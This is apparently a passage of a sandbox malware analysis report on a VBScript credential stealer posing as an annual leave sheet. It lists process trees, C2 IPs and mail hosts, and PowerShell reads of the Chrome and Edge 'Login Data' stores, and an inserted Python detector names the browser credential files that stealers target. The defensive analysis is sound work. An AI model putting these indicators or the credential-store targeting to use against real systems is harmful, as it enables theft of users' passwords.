                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara matchFile source: 30.2.powershell.exe.a64805c.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 79.2.powershell.exe.5a119c0.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.powershell.exe.5f34290.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 59.2.powershell.exe.60f8b88.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.powershell.exe.a64805c.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 59.2.powershell.exe.60d0b68.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.96f0000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.5c92f18.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.5c92f18.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.a380b24.16.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 79.2.powershell.exe.a1538b4.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.powershell.exe.5f34290.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.powershell.exe.5f5c2b0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 79.2.powershell.exe.a1538b4.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.powershell.exe.5f5c2b0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.96f0000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 59.2.powershell.exe.a72a22c.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 79.2.powershell.exe.5a399e0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 59.2.powershell.exe.60f8b88.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.5ce0820.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 59.2.powershell.exe.a72a22c.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 59.2.powershell.exe.60d0b68.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.a380b24.16.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 79.2.powershell.exe.5a399e0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.5ce0820.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 79.2.powershell.exe.5a119c0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000003B.00000002.3066006741.00000000060F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2757820569.0000000005CC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.2835678297.000000000A5FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.2774533305.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2828264055.00000000096F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000004F.00000002.3322494498.00000000059E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000003B.00000002.3191009735.000000000A6E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2757820569.0000000005BEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000003B.00000002.3066006741.00000000060A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000004F.00000002.3322494498.0000000005A39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.2774533305.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2829296591.000000000A338000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000004F.00000002.3451596999.000000000A135000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7628, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8000, type: MEMORYSTR
                  Source: Yara matchFile source: 79.2.powershell.exe.5a119c0.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.powershell.exe.5f34290.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 59.2.powershell.exe.60f8b88.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 59.2.powershell.exe.60d0b68.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.96f0000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.5c92f18.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.5c92f18.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.powershell.exe.5f34290.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.powershell.exe.5f5c2b0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.powershell.exe.5f5c2b0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.96f0000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 79.2.powershell.exe.5a399e0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 59.2.powershell.exe.60f8b88.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.5ce0820.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 59.2.powershell.exe.60d0b68.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 79.2.powershell.exe.5a399e0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.powershell.exe.5ce0820.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 79.2.powershell.exe.5a119c0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000003B.00000002.3066006741.00000000060F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2757820569.0000000005CC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.2835678297.000000000A5FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.2774533305.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2828264055.00000000096F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000004F.00000002.3322494498.00000000059E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000003B.00000002.3191009735.000000000A6E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.3585975750.0000000005936000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2757820569.0000000005BEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000003B.00000002.3066006741.00000000060A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000004F.00000002.3322494498.0000000005A39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.2774533305.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2829296591.000000000A338000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000004F.00000002.3451596999.000000000A135000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1276, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7628, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8000, type: MEMORYSTR
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
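                  The two "File opened" rows above are the credential-theft evidence in this section: powershell.exe, not a browser, reads the Chromium "Login Data" SQLite stores of Chrome and Edge. The detector below turns that into a check over rows in the flattened layout of this report. It is an added example, not part of the Joe Sandbox output or of the sample; the browser/credential-store table, the Firefox entries and the three sample rows that are not quoted from this section are constructed assumptions.

```python
import re
from typing import List, NamedTuple, Optional

# Row shape as extracted from the report: "Source: <process>File opened: <path>",
# sometimes with the "Jump to behavior" link label glued onto the end.
ROW_RE = re.compile(
    r"Source:\s*(?P<proc>.+?\.exe)File opened:\s*(?P<path>.+?)(?:Jump to behavior)?\s*$"
)

# Assumed table (not from the report): which browser owns which profile
# directory, and which files inside it hold credentials or session material.
BROWSER_DIRS = {
    r"\google\chrome\user data": "chrome.exe",
    r"\microsoft\edge\user data": "msedge.exe",
    r"\mozilla\firefox\profiles": "firefox.exe",
}
CREDENTIAL_STORES = {
    "chrome.exe": {"login data", "cookies", "web data", "local state"},
    "msedge.exe": {"login data", "cookies", "web data", "local state"},
    "firefox.exe": {"logins.json", "key4.db", "cookies.sqlite"},
}


class Finding(NamedTuple):
    process: str   # basename of the process that opened the file
    path: str      # full path that was opened
    owner: str     # browser executable expected to own that file


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_row(line: str) -> Optional[tuple]:
    """Return (process_path, opened_path) for a 'File opened' row, else None."""
    m = ROW_RE.search(line)
    if not m:
        return None
    return m.group("proc").strip(), m.group("path").strip()


def owning_browser(path: str) -> Optional[str]:
    low = path.lower()
    for fragment, owner in BROWSER_DIRS.items():
        if fragment in low:
            return owner
    return None


def detect(lines) -> List[Finding]:
    """Flag credential-store opens by any process other than the owning browser."""
    findings = []
    for line in lines:
        parsed = parse_row(line)
        if parsed is None:
            continue                      # volume queries, registry rows, etc.
        proc, path = parsed
        owner = owning_browser(path)
        if owner is None or basename(path) not in CREDENTIAL_STORES[owner]:
            continue                      # not a credential/session store
        proc_name = basename(proc)
        if proc_name != owner:
            findings.append(Finding(proc_name, path, owner))
    return findings


# Constructed sample: the two rows quoted from this section plus three made-up
# rows (a benign open by Chrome itself, a non-sensitive profile file, and a row
# of another type) to show what is and is not flagged.
SAMPLE_ROWS = [
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior",
    r"Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences",
    r"Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation",
]

if __name__ == "__main__":
    for f in detect(SAMPLE_ROWS):
        print(f"{f.process} opened {f.path} (expected only {f.owner})")
```

                  Only the row parser is specific to this report's layout; the ownership test itself (a non-browser process touching a browser's credential store) is the same check a practitioner would run over endpoint file-access telemetry, and it still fires if the stealer copies the database first, since the copy is itself an open of the original file.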

                  Remote Access Functionality

                  MITRE ATT&CK Matrix (numbers shown before a technique name are the report's own count badges, reproduced as given):

                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | ---
                  Gather Victim Identity Information | 222 Scripting | Valid Accounts | 1 Native API | 222 Scripting | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                  Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 12 Process Injection | 3 Obfuscated Files or Information | 1 Input Capture | 12 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                  Email Addresses | DNS Server | Domain Accounts | 12 Command and Scripting Interpreter | 1 Office Application Startup | 11 Registry Run Keys / Startup Folder | 2 Software Packing | Security Account Manager | 111 Security Software Discovery | SMB/Windows Admin Shares | 1 Screen Capture | 11 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | 4 PowerShell | 11 Registry Run Keys / Startup Folder | Login Hook | 1 DLL Side-Loading | NTDS | 2 Process Discovery | Distributed Component Object Model | 1 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                  Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 131 Virtualization/Sandbox Evasion | SSH | 1 Clipboard Data | 23 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                  Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 131 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                  DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Process Injection | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                  Behavior Graph (ID: 1596083, Sample: Annual Leave sheet 2025.vbs, Startdate: 21/01/2025, Architecture: WINDOWS, Score: 100)

                  The graph is rendered here as an indented process tree. Entries such as "3 other processes" are the report's own collapsed nodes; numbers in brackets after a process are the graph's created-registry-value/file counters, reproduced as shown.

                  Sample start
                    DNS/IP: reallyfreegeoip.org [signature: Tries to detect the country of the analysis system (by using the IP)]
                    DNS/IP: mail.privateemail.com
                    DNS/IP: 3 other IPs or domains
                    Signatures: Sigma detected: Register Wscript In Run Key; Found malware configuration; Malicious sample detected (through community Yara rule); 17 other signatures
                    wscript.exe [1]  signatures: VBScript performs obfuscated calls to suspicious functions; Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage); 3 other signatures
                      cmd.exe [1]  signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Bypasses PowerShell execution policy; PowerShell case anomaly found
                        powershell.exe [35]
                          DNS/IP: 45.200.149.104, ports 49708, 5000, Africa-on-Cloud-ASZA Seychelles
                          dropped: C:\Users\user\AppData\...\windowsupdate.vbS (ASCII)
                          dropped: C:\Users\user\AppData\...\ilcg05nv.cmdline (Unicode)
                          wscript.exe [2]  signature: Wscript starts Powershell (via cmd or directly)
                            dropped: C:\Users\user\AppData\Local\Temp\c.bat (ASCII)
                            cmd.exe [1]
                              cmd.exe [2]  signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly)
                                powershell.exe [16 46]  signatures: Creates multiple autostart registry keys; Tries to harvest and steal browser information (history, passwords, etc); Found suspicious powershell code related to unpacking or dynamic code loading; Loading BitLocker PowerShell Module
                                  DNS/IP: 158.101.44.242, ports 50055, 50059, 50062, ORACLE-BMC-31898US United States
                                  DNS/IP: checkip.dyndns.com 193.122.6.168, ports 49774, 49820, 49853, ORACLE-BMC-31898US United States
                                  DNS/IP: 3 other IPs or domains
                                  dropped: C:\Users\user\...\WindowsUpdate_706.vbs (ASCII)
                                  dropped: C:\Users\user\...\WindowsUpdate_706.bat (ASCII)
                                conhost.exe
                              conhost.exe
                          3 other processes
                            dropped: C:\Users\user\AppData\Local\...\ilcg05nv.dll (PE32)
                            cvtres.exe [1]
                        conhost.exe
                    wscript.exe
                      cmd.exe
